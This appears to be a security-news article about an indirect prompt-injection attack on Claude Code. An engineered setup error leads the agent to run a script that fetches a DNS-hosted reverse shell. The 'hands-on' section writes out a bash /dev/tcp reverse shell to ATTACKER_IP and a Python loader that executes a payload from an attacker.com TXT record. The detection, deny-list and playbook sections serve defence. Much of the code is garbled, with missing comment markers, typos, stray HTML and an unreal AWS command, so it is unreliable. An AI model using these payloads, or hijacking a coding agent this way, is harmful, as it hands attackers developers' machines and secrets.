New Claude Code Attack Turns Clean GitHub Repositories into Developer Machine Takeover Vectors – No Malicious Code Required + Video

Listen to this Post

Featured Image

Introduction:

A newly disclosed proof-of-concept attack demonstrates how AI-powered coding agents like Anthropic’s Claude Code can be silently weaponized against developers through a technique called indirect prompt injection. Published on June 25, 2026, by Mozilla’s Zero Day Investigative Network (0DIN), the attack shows that a completely clean-looking GitHub repository can trick Claude Code into opening a reverse shell on a developer’s machine without a single line of malicious code ever appearing in the repository itself. The result is catastrophic: a fully interactive shell running under the developer’s own user privileges, with access to every secret in the environment—from `ANTHROPIC_API_KEY` to `AWS_SECRET_ACCESS_KEY` and GITHUB_TOKEN.

Learning Objectives:

  • Understand the mechanics of indirect prompt injection and how AI coding agents can be manipulated through seemingly legitimate error messages and DNS-based payload delivery.
  • Identify the attack chain components—from repository cloning to DNS TXT record retrieval—and learn to detect each stage using static analysis, network monitoring, and behavioral indicators.
  • Implement practical defensive measures including sandboxing, permission scoping, command approval workflows, and runtime detection to protect developer workstations and CI/CD pipelines.

You Should Know:

  1. The Three-Step Attack Chain: How a Clean Repository Opens a Reverse Shell

The 0DIN researchers demonstrated that the compromise happens with “no exploit code, no warning, no suspicious command anyone had to approve”. The attack relies on three components that separately represent no threat and raise no suspicion:

  • Step 1 – The Benign Repository: A clean-looking GitHub repository with standard setup instructions, such as installing dependencies and initializing the project (e.g., pip3 install -r requirements.txt, python3 -m axiom init). The repository contains no obvious malicious instructions or malicious code, which helps it avoid raising immediate red flags.

  • Step 2 – The Engineered Error: The Python package is intentionally designed to refuse execution until it has been initialized. It generates an error instructing the user to execute python3 -m axiom init. Claude Code treats this as a normal setup issue and automatically runs the suggested command while attempting to recover from the error.

  • Step 3 – DNS-Based Payload Retrieval: Executing `python3 -m axiom init` calls a shell script that retrieves a configuration value stored in a DNS TXT record controlled by the attacker. The DNS value is Base64-encoded, meaning the reverse-shell payload does not appear in plaintext inside the repository or network traffic. The retrieved value is then executed as a command.

As the 0DIN researchers explain: “Claude Code never decided to open a shell. It decided to fix an error. The reverse shell is three indirection steps away from anything Claude Code actually evaluated: an error message it trusted, a script that fetched a value, and a DNS record it never saw”. The attacker now has an interactive shell running as the developer’s own user.

  1. Hands-On: Simulating the Attack Vector (Educational Purpose Only)

To understand the mechanism, security professionals can simulate the DNS TXT record retrieval technique in a controlled lab environment. The following demonstrates how an attacker might stage the external payload:

Setting Up the DNS TXT Record (Attacker Infrastructure):

 On attacker-controlled DNS server, add a TXT record
 Example using bind zone file:
axiom-config IN TXT "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

Or using a cloud DNS provider via API (conceptual)
 The TXT record value is typically Base64-encoded to avoid detection
echo "bash -i >& /dev/tcp/192.168.1.100/4444 0>&1" | base64
 Output: YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzQ0NDQgMD4mMQ==

The Malicious Setup Script (axiom/init.py):

import dns.resolver
import subprocess
import base64
import os

def fetch_and_execute():
 Query the attacker-controlled DNS TXT record
resolver = dns.resolver.Resolver()
resolver.nameservers = ['8.8.8.8']  Or attacker's DNS
try:
answers = resolver.resolve('axiom-config.attacker.com', 'TXT')
for rdata in answers:
 Decode Base64 payload and execute
payload = base64.b64decode(rdata.strings[bash]).decode()
subprocess.Popen(payload, shell=True, 
stdout=subprocess.DEVNULL, 
stderr=subprocess.DEVNULL)
except Exception as e:
print(f"Initialization error: {e}")
sys.exit(1)

if <strong>name</strong> == "<strong>main</strong>":
fetch_and_execute()

Detection Command (Linux/macOS):

 Monitor for suspicious DNS TXT queries
sudo tcpdump -i any -1 port 53 and udp -v | grep -i "TXT"

Check for unexpected outbound shell connections
sudo netstat -tunap | grep ESTABLISHED | grep -v "127.0.0.1"

Audit running processes for suspicious Python subprocess calls
ps aux | grep -E "python.axiom|bash.dev/tcp"

Windows Detection Equivalent (PowerShell):

 Monitor DNS queries for TXT records
Get-WinEvent -LogName "Microsoft-Windows-DNS-Client/Operational" | 
Where-Object { $_.Message -match "TXT" }

Check for reverse shell connections
Get-1etTCPConnection -State Established | 
Where-Object { $<em>.RemotePort -eq 4444 -or $</em>.RemotePort -eq 1337 }
  1. Exploitation via MCP Protocol and Command Injection Bypasses

Beyond the DNS-based attack, researchers have identified multiple vulnerability vectors in Claude Code’s architecture. The Model Context Protocol (MCP) allows AI tools to interact with external services like Jira, Confluence, GitHub, databases, and internal APIs. A professional proof-of-concept demonstrates how a malicious MCP server can mislead users into approving arbitrary command execution by misrepresenting tool parameters in confirmation prompts. The vulnerability allows an attacker-controlled server to provide a benign description (e.g., “Read a file”) while the underlying execution logic triggers a reverse shell or unauthorized file writes.

Additionally, CVE-2026-24887 (CVSS 7.7 High) details a command injection vulnerability where an error in command parsing allowed bypass of the Claude Code confirmation prompt to trigger execution of untrusted commands through the `find` command. Reliably exploiting this required the ability to add untrusted content into a Claude Code context window. This vulnerability affects versions prior to 2.0.72.

Verification Commands:

 Check Claude Code version
claude --version

Update to patched version (2.0.72 or later)
npm update -g @anthropic-ai/claude-code

Verify update
npm list -g @anthropic-ai/claude-code

4. Information Disclosure and Sandbox Bypass Vulnerabilities

CVE-2026-21852 (Check Point CPAI-2026-5741) describes an information disclosure vulnerability in Anthropic Claude Code that allows attacker-controlled repositories to exfiltrate sensitive data, including Anthropic API keys, before users confirm trust. Versions prior to 2.0.65 are affected.

The network sandbox mechanism, designed to prevent sensitive data leakage through local proxies and allowlist rules, has been found to have a semantic inconsistency between policy judgment and actual network execution. When input contains invisible control characters such as special encoding or null bytes, the filtering logic and parsing logic may obtain different results, allowing access control to be bypassed. Requests considered legitimate in the security judgment stage may be directed to completely different external hosts during the actual connection stage, forming a data leakage channel.

Check Point IPS Protection Configuration:

 In Security Gateway R81/R80/R77/R75:
 Navigate to IPS tab > Protections
 Search for: "Anthropic Claude Code Information Disclosure (CVE-2026-21852)"
 Enable protection and install policy on all Security Gateways

Network Monitoring Rule (Snort/Suricata):

 Detect suspicious DNS TXT queries for configuration retrieval
alert udp $HOME_NET any -> any 53 (msg:"Suspicious DNS TXT Query"; 
content:"|00 00 01 00 00 01 00 00 00 00 00 00|"; offset:2; 
content:"|00 01 00 01|"; within:4; distance:0; 
pcre:"/^[a-z0-9.-]+.(attacker|malicious)/"; 
classtype:policy-violation; sid:20260001; rev:1;)
  1. Defensive Measures: Securing AI Coding Agents in Development Environments

The attack demonstrates how AI coding agents can become execution bridges between untrusted repositories and developer machines. For CISOs and security teams, the key issue is trust transfer—developers may trust Claude Code to interpret errors and fix setup problems, but attackers can manipulate that workflow by placing malicious instructions several steps away from the visible repository content.

Recommended Defensive Controls:

A. Permission Scoping and Identity Governance:

AI coding agents should have tightly scoped permissions, short-lived credentials, and access only to the resources required for their specific tasks. Implement the principle of least privilege for all agentic tools.

B. Command Approval Workflow Hardening:

 Configure Claude Code to require explicit approval for all commands
 Create or modify ~/.claude/settings.json:
{
"permissions": {
"require_approval": true,
"deny": ["bash -i", "nc -e", "python3 -m axiom init"],
"allowlist_domains": ["api.anthropic.com", "github.com"]
}
}

C. Runtime Detection and Monitoring:

0DIN researchers suggest that AI agents should disclose the full execution chain of setup commands, including scripts and code fetched dynamically at runtime. Implement the following monitoring:

Linux Audit Rule (auditd):

 Monitor execution of python3 -m commands
auditctl -a always,exit -S execve -F path=/usr/bin/python3 -k python_module_exec

Monitor DNS queries for TXT records
auditctl -a always,exit -S connect -F addr!=127.0.0.1 -k outbound_connection

Windows PowerShell Monitoring Script:

 Monitor for suspicious process creation
Register-WmiEvent -Query "SELECT  FROM Win32_ProcessStartTrace" -Action {
if ($EventArgs.ProcessName -match "python|bash|cmd" -and 
$EventArgs.CommandLine -match "axiom|reverse|shell") {
Write-EventLog -LogName "Security" -Source "AI-Agent-Monitor" 
-EntryType Warning -EventId 1001 -Message "Suspicious command: $($EventArgs.CommandLine)"
}
}

D. Repository Scanning and Validation:

Implement automated scanning of GitHub repositories for indirect prompt injection patterns. The OWASP Prompt Injection Prevention Cheat Sheet identifies code comments, documentation, commit messages, and merge request descriptions as potential vectors for malicious instructions.

Python Scanner Snippet:

import re
import os

def scan_repo_for_suspicious_patterns(repo_path):
suspicious_patterns = [
r'python3 -m \w+ init',
r'pip3? install . && .',
r'dig.TXT.&&',
r'nslookup.TXT.|.bash',
r'curl.|.sh'
]

for root, dirs, files in os.walk(repo_path):
for file in files:
if file.endswith(('.py', '.sh', '.md', '.txt')):
filepath = os.path.join(root, file)
with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
content = f.read()
for pattern in suspicious_patterns:
if re.search(pattern, content, re.IGNORECASE):
print(f"[!] Suspicious pattern found: {filepath} -> {pattern}")

6. Enterprise Mitigation Strategy and Incident Response

Organizations should treat this as a developer workstation and AI agent governance issue, not only as a repository security problem. The following enterprise-grade controls are recommended:

Network Segmentation:

  • Isolate developer workstations from production environments
  • Implement egress filtering to block outbound reverse shell connections
  • Use a forward proxy with allowlist for outbound traffic

Credential Hardening:

  • Rotate API keys and tokens frequently
  • Use short-lived credentials with automatic expiration
  • Implement secrets rotation for ANTHROPIC_API_KEY, AWS_SECRET_ACCESS_KEY, and `GITHUB_TOKEN`

Incident Response Playbook for Suspected AI Agent Compromise:

 1. Immediate isolation - kill suspicious processes
pkill -f "python3 -m axiom" && pkill -f "bash.dev/tcp"

<ol>
<li>Revoke all temporary credentials
aws sts revoke-credentials --access-key-id $COMPROMISED_KEY
gh auth logout</p></li>
<li><p>Capture forensic artifacts
sudo tar -czf /tmp/forensic_$(date +%Y%m%d_%H%M%S).tgz \
~/.bash_history ~/.claude/ ~/.aws/ ~/.ssh/ /var/log/syslog</p></li>
<li><p>Network isolation - block outbound to suspicious IPs
sudo iptables -A OUTPUT -d ATTACKER_IP -j DROP</p></li>
<li><p>Force credential rotation for all developers
Implement organization-wide API key rotation policy

What Undercode Say:

  • Key Takeaway 1: The attack exploits trust at multiple levels—trust in the repository’s apparent cleanliness, trust in the AI agent’s error recovery logic, and trust in DNS resolution. The three indirection steps (error message → script → DNS record) ensure that no single component appears malicious, making detection through traditional static analysis nearly impossible.

  • Key Takeaway 2: Identity governance for AI agents is no longer optional. As Sanjar K. notes, “These agents should have tightly scoped permissions, short-lived credentials, and access only to the resources required for their specific tasks.” The attack succeeds because Claude Code runs with the developer’s full privileges—the same privileges that access AWS, GitHub, and internal systems.

The attack chain reveals a fundamental paradigm shift in cybersecurity: AI agents are no longer passive tools but active execution environments that can be socially engineered through indirect means. The DNS TXT record technique is particularly insidious because it decouples the malicious payload from the repository itself, defeating both human code review and automated security scanners. Organizations must now treat AI coding agents as privileged execution contexts requiring the same level of scrutiny as any other system component with network access and command execution capabilities.

The Mozilla 0DIN researchers’ demonstration should serve as a wake-up call for security teams. The attack does not require sophisticated exploitation techniques—it merely leverages the AI agent’s natural behavior of automatically “fixing” errors during setup workflows. This is not a vulnerability in the AI model itself but rather a design flaw in how we integrate AI agents into development workflows without proper security boundaries.

Prediction:

  • +1 The disclosure of this attack vector will accelerate the development of AI-specific security frameworks and runtime protection mechanisms. We can expect to see new open-source tools for detecting indirect prompt injection in repositories, similar to how SAST tools emerged for code vulnerabilities.

  • -1 Threat actors will rapidly weaponize this technique, distributing poisoned repositories through fake job postings, tutorials, blog posts, and direct messages. The low barrier to entry means we will see widespread exploitation within 3-6 months.

  • -1 Supply chain attacks will evolve to incorporate indirect prompt injection as a stealthy persistence mechanism. Attackers will target popular open-source projects by submitting pull requests that appear to fix setup errors but actually introduce the three-step indirection chain.

  • +1 AI vendors like Anthropic will implement mandatory command approval workflows that cannot be bypassed, along with sandboxing that restricts AI agents to minimal privileges. Version 2.0.72 and later already address some of these issues.

  • -1 The attack highlights a critical gap in developer security training. Most developers are unaware that AI agents can be manipulated through seemingly legitimate error messages, creating a massive educational and policy gap that will take years to close.

▶️ Related Video (72% Match):

https://www.youtube.com/watch?v=0ReF4bt1otQ

🎯Let’s Practice For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

IT/Security Reporter URL:

Reported By: Cybersecuritynews Share – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky